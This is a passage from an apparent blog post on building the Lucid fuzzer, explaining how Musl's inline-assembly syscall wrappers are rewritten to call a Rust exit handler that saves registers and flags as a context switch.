<p>For syscalls, there is a well-defined calling convention. The “syscall number”, which determines what syscall you want, goes in <code class="language-plaintext highlighter-rouge">rax</code>, and the next n parameters are passed in registers in this order: <code class="language-plaintext highlighter-rouge">rdi</code>, <code class="language-plaintext highlighter-rouge">rsi</code>, <code class="language-plaintext highlighter-rouge">rdx</code>, <code class="language-plaintext highlighter-rouge">r10</code>, <code class="language-plaintext highlighter-rouge">r8</code>, and <code class="language-plaintext highlighter-rouge">r9</code>.</p>
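<p>As a small illustration of that register convention, here is a sketch that performs <code class="language-plaintext highlighter-rouge">write(fd, buf, len)</code> by hand. It assumes x86-64 Linux and GCC or Clang; the helper names <code class="language-plaintext highlighter-rouge">raw_syscall3</code> and <code class="language-plaintext highlighter-rouge">raw_write</code> are made up for this example and are not part of Musl:</p>

```c
#include <stddef.h>
#include <sys/syscall.h>   /* SYS_write */

/* Hypothetical helper with the same shape as Musl's __syscall3. */
static long raw_syscall3(long n, long a1, long a2, long a3)
{
    unsigned long ret;
    /* rax = syscall number, rdi/rsi/rdx = first three arguments */
    __asm__ __volatile__ ("syscall"
                          : "=a"(ret)
                          : "a"(n), "D"(a1), "S"(a2), "d"(a3)
                          : "rcx", "r11", "memory");
    return ret;
}

/* write(fd, buf, len): on failure the raw return value is -errno */
static long raw_write(int fd, const void *buf, size_t len)
{
    return raw_syscall3(SYS_write, fd, (long)buf, (long)len);
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">raw_write(1, "hi\n", 3)</code> should print to stdout and return the number of bytes written. Note that there is no <code class="language-plaintext highlighter-rouge">errno</code> at this level; turning a negative return value into <code class="language-plaintext highlighter-rouge">errno</code> is the job of the libc wrapper.</p>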

<p>This is pretty intuitive, but the syntax is a bit mystifying: on those <code class="language-plaintext highlighter-rouge">__asm__ __volatile__ ("syscall"</code> lines, it’s kind of hard to see what’s going on. Let’s take the most convoluted function, <code class="language-plaintext highlighter-rouge">__syscall6</code>, and break down all the syntax. We can think of the assembly syntax as a format string like the ones used for printing, except this one emits code instead:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">unsigned long ret</code> is where we will store the result of the syscall to indicate whether or not it was a success. In the inline assembly, we can see that there is a <code class="language-plaintext highlighter-rouge">:</code> and then <code class="language-plaintext highlighter-rouge">"=a"(ret)</code>; this first set of parameters after the initial colon holds the <em>output</em> parameters. We are saying: please store the value left in <code class="language-plaintext highlighter-rouge">rax</code> (symbolized in the syntax as <code class="language-plaintext highlighter-rouge">a</code>) into the variable <code class="language-plaintext highlighter-rouge">ret</code>.</li>
  <li>The next series of params after the next colon are <em>input</em> parameters. <code class="language-plaintext highlighter-rouge">"a"(n)</code> is saying: place the function argument <code class="language-plaintext highlighter-rouge">n</code>, which is the syscall number, into <code class="language-plaintext highlighter-rouge">rax</code>, which is symbolized again as <code class="language-plaintext highlighter-rouge">a</code>. Next, store <code class="language-plaintext highlighter-rouge">a1</code> in <code class="language-plaintext highlighter-rouge">rdi</code>, which is symbolized as <code class="language-plaintext highlighter-rouge">D</code>, and so forth.</li>
  <li>Arguments 4-6 are placed in registers above the assembly statement. For instance, the syntax <code class="language-plaintext highlighter-rouge">register long r10 __asm__("r10") = a4;</code> is a strong compiler hint to store <code class="language-plaintext highlighter-rouge">a4</code> into <code class="language-plaintext highlighter-rouge">r10</code>. Later, <code class="language-plaintext highlighter-rouge">"r"(r10)</code> says to pass the variable <code class="language-plaintext highlighter-rouge">r10</code> in a general purpose register (which is already satisfied).</li>
  <li>The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. The <code class="language-plaintext highlighter-rouge">syscall</code> instruction itself overwrites <code class="language-plaintext highlighter-rouge">rcx</code> and <code class="language-plaintext highlighter-rouge">r11</code> (with the return address and the saved flags), and the kernel may write to memory, so all three are listed.</li>
</ul>
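<p>To make the three colon-separated sections concrete outside of a syscall, here is a tiny sketch (GCC or Clang on x86-64 assumed; the names <code class="language-plaintext highlighter-rouge">add_u64</code> and <code class="language-plaintext highlighter-rouge">read_via_r10</code> are invented for illustration). The first function has one output, two inputs, and a clobber. The second shows that a variable pinned with <code class="language-plaintext highlighter-rouge">register ... __asm__("r10")</code> really is sitting in <code class="language-plaintext highlighter-rouge">r10</code> when the assembly runs:</p>

```c
#include <stdint.h>

/* out = a + b.
 * "=r"(out): the result comes back in any general purpose register
 * "0"(a):    a starts out in the same register as operand 0
 * "r"(b):    b may live in any general purpose register
 * "cc":      the add changes the CPU flags */
static uint64_t add_u64(uint64_t a, uint64_t b)
{
    uint64_t out;
    __asm__ ("add %2, %0" : "=r"(out) : "0"(a), "r"(b) : "cc");
    return out;
}

static long read_via_r10(long v)
{
    long out;
    register long r10 __asm__("r10") = v;   /* pin v to r10 */
    /* The template names r10 directly; the "r"(r10) input operand is
     * what guarantees the value is actually there at this point. */
    __asm__ __volatile__ ("mov %%r10, %0" : "=r"(out) : "r"(r10));
    return out;
}
```

<p>This is the same trick the Musl wrappers rely on for arguments 4-6: there is no single-letter constraint for <code class="language-plaintext highlighter-rouge">r10</code>, <code class="language-plaintext highlighter-rouge">r8</code>, or <code class="language-plaintext highlighter-rouge">r9</code>, so the variable is pinned first and then passed with the generic <code class="language-plaintext highlighter-rouge">"r"</code> constraint.</p>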

<p>With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, defined by the System V ABI, is different from that of a syscall: the register utilization differs. So when we call <code class="language-plaintext highlighter-rouge">__syscall6</code> as an ordinary function, its arguments arrive in the following locations:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">n</code> → <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li><code class="language-plaintext highlighter-rouge">a1</code> → <code class="language-plaintext highlighter-rouge">rsi</code></li>
  <li><code class="language-plaintext highlighter-rouge">a2</code> → <code class="language-plaintext highlighter-rouge">rdx</code></li>
  <li><code class="language-plaintext highlighter-rouge">a3</code> → <code class="language-plaintext highlighter-rouge">rcx</code></li>
  <li><code class="language-plaintext highlighter-rouge">a4</code> → <code class="language-plaintext highlighter-rouge">r8</code></li>
  <li><code class="language-plaintext highlighter-rouge">a5</code> → <code class="language-plaintext highlighter-rouge">r9</code></li>
  <li><code class="language-plaintext highlighter-rouge">a6</code> → the stack (only six integer arguments fit in registers)</li>
</ul>

<p>So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that <code class="language-plaintext highlighter-rouge">syscall</code> instruction and instead call into Lucid.</p>

<h2 id="conditionally-calling-into-lucid">Conditionally Calling Into Lucid</h2>
<p>So we need a way in these function bodies to call into Lucid instead of emitting <code class="language-plaintext highlighter-rouge">syscall</code> instructions. To do so we need to define our own calling convention. For now I’ve been using the following:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">r15</code>: contains the address of the global Lucid execution context</li>
  <li><code class="language-plaintext highlighter-rouge">r14</code>: contains an “exit reason” which is just an <code class="language-plaintext highlighter-rouge">enum</code> explaining why we are context switching</li>
  <li><code class="language-plaintext highlighter-rouge">r13</code>: is the base address of the register bank structure of the Lucid execution context; we need this memory section to store our register values and save our state when we context switch</li>
  <li><code class="language-plaintext highlighter-rouge">r12</code>: stores the address of the “exit handler” which is the function to call to context switch</li>
</ul>

<p>This will no doubt change some as we add more features/functionality. I should also note that, according to the ABI, it is the function’s responsibility to preserve these registers: the caller expects that they won’t change across a function call, and here we are changing them. That’s ok, because we bind them to explicit register variables in the function where we use them, so the compiler is aware that they change. What the compiler is going to do now is push those registers onto the stack to save them before it executes any of the function’s code, and then pop them back into the registers before returning so that the caller gets back the expected values. So we’re free to use them.</p>

<p>So to alter the functions, I changed the function logic to first check whether we have a global Lucid execution context. If we do not, we execute the normal Musl function. You can see that here, as I’ve moved the normal function logic out to a separate function called <code class="language-plaintext highlighter-rouge">__syscall6_original</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6_original</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r10</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r10"</span><span class="p">)</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r8</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r8"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a5</span><span class="p">;</span>
	<span class="k">register</span> <span class="kt">long</span> <span class="n">r9</span>  <span class="n">__asm__</span><span class="p">(</span><span class="s">"r9"</span><span class="p">)</span>  <span class="o">=</span> <span class="n">a6</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r10</span><span class="p">),</span>
							<span class="s">"r"</span><span class="p">(</span><span class="n">r8</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">r9</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
</code></pre></div></div>
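<p>The fall-through pattern can be tried out in isolation. The sketch below is a deliberately simplified stand-in, not Lucid’s code: it uses an ordinary C function pointer rather than the register-based convention, and every name in it (<code class="language-plaintext highlighter-rouge">demo_ctx</code>, <code class="language-plaintext highlighter-rouge">g_demo_ctx</code>, <code class="language-plaintext highlighter-rouge">demo_syscall3</code>, <code class="language-plaintext highlighter-rouge">demo_fake_handler</code>) is hypothetical. It assumes x86-64 Linux:</p>

```c
#include <stddef.h>
#include <sys/syscall.h>   /* SYS_getpid */

/* Hypothetical, simplified context: the real one carries far more state. */
typedef long (*demo_handler_t)(long n, long a1, long a2, long a3);
struct demo_ctx { demo_handler_t exit_handler; };

static struct demo_ctx *g_demo_ctx = NULL;   /* NULL means "no sandbox" */

/* The untouched path: a genuine syscall instruction. */
static long demo_syscall3_original(long n, long a1, long a2, long a3)
{
    unsigned long ret;
    __asm__ __volatile__ ("syscall"
                          : "=a"(ret)
                          : "a"(n), "D"(a1), "S"(a2), "d"(a3)
                          : "rcx", "r11", "memory");
    return ret;
}

/* The patched entry point: go to the kernel unless a context is set. */
static long demo_syscall3(long n, long a1, long a2, long a3)
{
    if (!g_demo_ctx) { return demo_syscall3_original(n, a1, a2, a3); }
    return g_demo_ctx->exit_handler(n, a1, a2, a3);
}

/* Example handler that "emulates" every syscall with a fixed result. */
static long demo_fake_handler(long n, long a1, long a2, long a3)
{
    (void)n; (void)a1; (void)a2; (void)a3;
    return 1234;
}
```

<p>With <code class="language-plaintext highlighter-rouge">g_demo_ctx</code> left as <code class="language-plaintext highlighter-rouge">NULL</code>, <code class="language-plaintext highlighter-rouge">demo_syscall3(SYS_getpid, 0, 0, 0)</code> reaches the kernel as usual. Once it points at a context whose handler is <code class="language-plaintext highlighter-rouge">demo_fake_handler</code>, the same call never leaves userland. The appeal of this design is that the same libc build keeps working when it is run outside of the sandbox.</p>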

<p>However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers <code class="language-plaintext highlighter-rouge">r12-r15</code> in accordance with what we are expecting there when we context-switch to Lucid.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall6</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a4</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a5</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a6</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">__syscall6_original</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">);</span> <span class="p">}</span>
	
    <span class="k">register</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r12</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r12"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r13</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r13"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">register_bank</span><span class="p">);</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r14</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r14"</span><span class="p">)</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
    <span class="k">register</span> <span class="kt">long</span> <span class="n">r15</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">g_lucid_ctx</span><span class="p">);</span>
</code></pre></div></div>

<p>Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the <code class="language-plaintext highlighter-rouge">syscall</code> instruction with <code class="language-plaintext highlighter-rouge">call r12</code>, calling our exit handler as if it’s a normal function:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__asm__</span> <span class="nf">__volatile__</span> <span class="p">(</span>
        <span class="s">"mov %1, %%rax</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %2, %%rdi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %3, %%rsi</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %4, %%rdx</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %5, %%r10</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %6, %%r8</span><span class="se">\n\t</span><span class="s">"</span>
	<span class="s">"mov %7, %%r9</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"call *%%r12</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"mov %%rax, %0</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span> <span class="s">"=r"</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a2</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a3</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a4</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a5</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a6</span><span class="p">),</span>
		  <span class="s">"r"</span> <span class="p">(</span><span class="n">r12</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r13</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r14</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">r15</span><span class="p">)</span>
        <span class="o">:</span> <span class="s">"rax"</span><span class="p">,</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span>
    <span class="p">);</span>
	
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</code></pre></div></div>
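<p>For experimenting with the idea of calling a handler through a pinned register, here is a self-contained sketch. It is a variation on the code above rather than a copy of it, and it rests on several assumptions: x86-64 Linux with GCC or Clang, a made-up assembly stub <code class="language-plaintext highlighter-rouge">demo_exit_handler</code> standing in for Lucid’s handler, and a made-up wrapper <code class="language-plaintext highlighter-rouge">demo_call_handler</code>. It passes the argument with a specific register constraint (<code class="language-plaintext highlighter-rouge">"D"</code>) instead of <code class="language-plaintext highlighter-rouge">mov</code>ing it from a generic <code class="language-plaintext highlighter-rouge">"r"</code> operand, so the compiler rather than the template decides how the value gets into <code class="language-plaintext highlighter-rouge">rdi</code>:</p>

```c
#include <stdint.h>

/* Hypothetical stand-in for the exit handler: a bare assembly stub that
 * returns rdi + r14 in rax so the caller can see both registers arrived. */
__asm__ (
    ".pushsection .text\n"
    ".globl demo_exit_handler\n"
    ".type demo_exit_handler, @function\n"
    "demo_exit_handler:\n"
    "    mov %r14, %rax\n"
    "    add %rdi, %rax\n"
    "    ret\n"
    ".popsection\n"
);
extern void demo_exit_handler(void);

static long demo_call_handler(long exit_reason, long a1)
{
    long ret;
    /* Pin the handler address and the exit reason to r12 and r14. */
    register long r12 __asm__("r12") = (long)(uintptr_t)&demo_exit_handler;
    register long r14 __asm__("r14") = exit_reason;

    __asm__ __volatile__ (
        "lea -128(%%rsp), %%rsp\n\t"   /* step over the red zone first */
        "call *%%r12\n\t"              /* pushes a return address */
        "lea 128(%%rsp), %%rsp\n\t"    /* put rsp back where it was */
        : "=a"(ret)
        : "D"(a1), "r"(r12), "r"(r14)
        : "rcx", "r11", "cc", "memory"
    );
    return ret;
}
```

<p>Here <code class="language-plaintext highlighter-rouge">demo_call_handler(7, 35)</code> returns <code class="language-plaintext highlighter-rouge">42</code>. The two <code class="language-plaintext highlighter-rouge">lea</code> instructions are a precaution for this standalone example: the compiler does not know the template contains a <code class="language-plaintext highlighter-rouge">call</code>, so it may keep locals in the 128-byte red zone below <code class="language-plaintext highlighter-rouge">rsp</code>, which the pushed return address would otherwise overwrite. If you look at the disassembly, you should also see <code class="language-plaintext highlighter-rouge">r12</code> and <code class="language-plaintext highlighter-rouge">r14</code> being saved and restored around the function body, since they are callee-saved.</p>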

<p>So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are set up <em>as if</em> we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!</p>

<h2 id="implementing-a-context-switch">Implementing a Context Switch</h2>
<p>The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="s">"C"</span> <span class="p">{</span> <span class="k">fn</span> <span class="nf">exit_handler</span><span class="p">();</span> <span class="p">}</span>
<span class="nd">global_asm!</span><span class="p">(</span>
    <span class="s">".global exit_handler"</span><span class="p">,</span>
    <span class="s">"exit_handler:"</span><span class="p">,</span>
</code></pre></div></div>

<p>So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses <code class="language-plaintext highlighter-rouge">r13</code> to store the base address of the execution context register bank:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Default,</span> <span class="nd">Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">RegisterBank</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">rax</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rbx</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rcx</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rdx</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rsi</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">rdi</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rbp</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">rsp</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r8</span><span class="p">:</span>     <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r9</span><span class="p">:</span>     <span class="nb">usize</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">r10</span><span class="p">:</span>    <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r11</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r12</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r13</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r14</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
    <span class="n">r15</span><span class="p">:</span>        <span class="nb">usize</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We can save the register values then by doing this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Save the GPRS to memory</span>
<span class="s">"mov [r13 + 0x0], rax"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x8], rbx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x10], rcx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x18], rdx"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x20], rsi"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x28], rdi"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x30], rbp"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x38], rsp"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x40], r8"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x48], r9"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x50], r10"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x58], r11"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x60], r12"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x68], r13"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x70], r14"</span><span class="p">,</span>
<span class="s">"mov [r13 + 0x78], r15"</span><span class="p">,</span>
</code></pre></div></div>
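<p>Those hard-coded offsets only work because <code class="language-plaintext highlighter-rouge">#[repr(C)]</code> keeps the fields in declaration order and each one is 8 bytes wide on x86-64. One way to sanity check the numbers is to mirror the layout in C and let the compiler confirm them. This is a sketch; <code class="language-plaintext highlighter-rouge">struct register_bank</code> and <code class="language-plaintext highlighter-rouge">bank_offset</code> are hypothetical names, not something taken from the Lucid or Musl sources:</p>

```c
#include <stddef.h>   /* offsetof, size_t */
#include <stdint.h>

/* Hypothetical C mirror of the Rust RegisterBank (same field order). */
struct register_bank {
    uint64_t rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp;
    uint64_t r8, r9, r10, r11, r12, r13, r14, r15;
};

/* Field number i (counting from 0) lives at byte offset 8 * i. */
static size_t bank_offset(size_t index)
{
    return index * sizeof(uint64_t);
}

/* Compile-time checks against the offsets used in the assembly stub. */
_Static_assert(offsetof(struct register_bank, rax) == 0x00, "rax offset");
_Static_assert(offsetof(struct register_bank, rsp) == 0x38, "rsp offset");
_Static_assert(offsetof(struct register_bank, r8)  == 0x40, "r8 offset");
_Static_assert(offsetof(struct register_bank, r13) == 0x68, "r13 offset");
_Static_assert(offsetof(struct register_bank, r15) == 0x78, "r15 offset");
_Static_assert(sizeof(struct register_bank) == 0x80, "16 registers * 8 bytes");
```

<p>If a field were ever added in the middle of the struct, checks like these would fail at build time instead of letting the stub silently write registers into the wrong slots.</p>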

<p>This saves the register values into the register bank for preservation. Next, we’ll want to preserve the CPU’s flags. Luckily, there is a single instruction for this purpose, <code class="language-plaintext highlighter-rouge">pushfq</code>, which pushes the flag values onto the stack.</p>

<p>We’re using a pure assembly stub right now, but we’d like to start using Rust at some point, and that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function, though, we need to set up the register values to adhere to the function calling ABI. Two pieces of data that we want to be accessible are the execution context and the reason why we exited; those are in <code class="language-plaintext highlighter-rouge">r15</code> and <code class="language-plaintext highlighter-rouge">r14</code> respectively. So we can simply place those into the registers used for passing function arguments and call into a Rust function called <code class="language-plaintext highlighter-rouge">lucid_handler</code>.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Save the CPU flags</span>
<span class="s">"pushfq"</span><span class="p">,</span>

<span class="c1">// Set up the function arguments for lucid_handler according to ABI</span>
<span class="s">"mov rdi, r15"</span><span class="p">,</span> <span class="c1">// Put the pointer to the context into RDI</span>
<span class="s">"mov rsi, r14"</span><span class="p">,</span> <span class="c1">// Put the exit reason into RSI</span>

<span class="c1">// At this point, we've been called into by Bochs, this should mean that </span>
<span class="c1">// at the beginning of our exit_handler, rsp was only 8-byte aligned and</span>
<span class="c1">// thus, by ABI, we cannot legally call into a Rust function since to do so</span>
<span class="c1">// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte</span>
<span class="c1">// aligned the stack for us and so we are free to `call`</span>
<span class="s">"call lucid_handler"</span><span class="p">,</span>
</code></pre></div></div>
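<p>The alignment comment in the stub is easy to get backwards, so here is a small sketch that models only the arithmetic. It does not touch the real stack. The function names are made up for illustration, and it assumes the stub pushes nothing else onto the stack before <code class="language-plaintext highlighter-rouge">pushfq</code>.</p>

```rust
// The System V AMD64 ABI expects rsp to be 16-byte aligned at the point of a
// `call` instruction.
const CALL_ALIGNMENT: u64 = 16;

// Is this rsp value legal to execute a `call` from?
fn is_call_aligned(rsp: u64) -> bool {
    rsp % CALL_ALIGNMENT == 0
}

// rsp as seen by the first instruction of a function: the caller was aligned,
// then `call` pushed an 8-byte return address.
fn rsp_at_function_entry(aligned_rsp_at_call_site: u64) -> u64 {
    aligned_rsp_at_call_site - 8
}

// rsp after `pushfq`, which pushes the 8-byte RFLAGS value in 64-bit mode.
fn rsp_after_pushfq(rsp: u64) -> u64 {
    rsp - 8
}
```

<p>Feeding an aligned value such as <code class="language-plaintext highlighter-rouge">0x7fff_ffff_e000</code> through <code class="language-plaintext highlighter-rouge">rsp_at_function_entry</code> gives a misaligned value, and passing that through <code class="language-plaintext highlighter-rouge">rsp_after_pushfq</code> gives an aligned one again, which is the property the stub relies on.</p>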

<p>So now, we are free to execute real Rust code! Here is <code class="language-plaintext highlighter-rouge">lucid_handler</code> as of now:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This is where the actual logic is for handling the Bochs exit, we have to </span>
<span class="c1">// use no_mangle here so that we can call it from the assembly blob. We need</span>
<span class="c1">// to see why we've exited and dispatch to the appropriate function</span>
<span class="nd">#[no_mangle]</span>
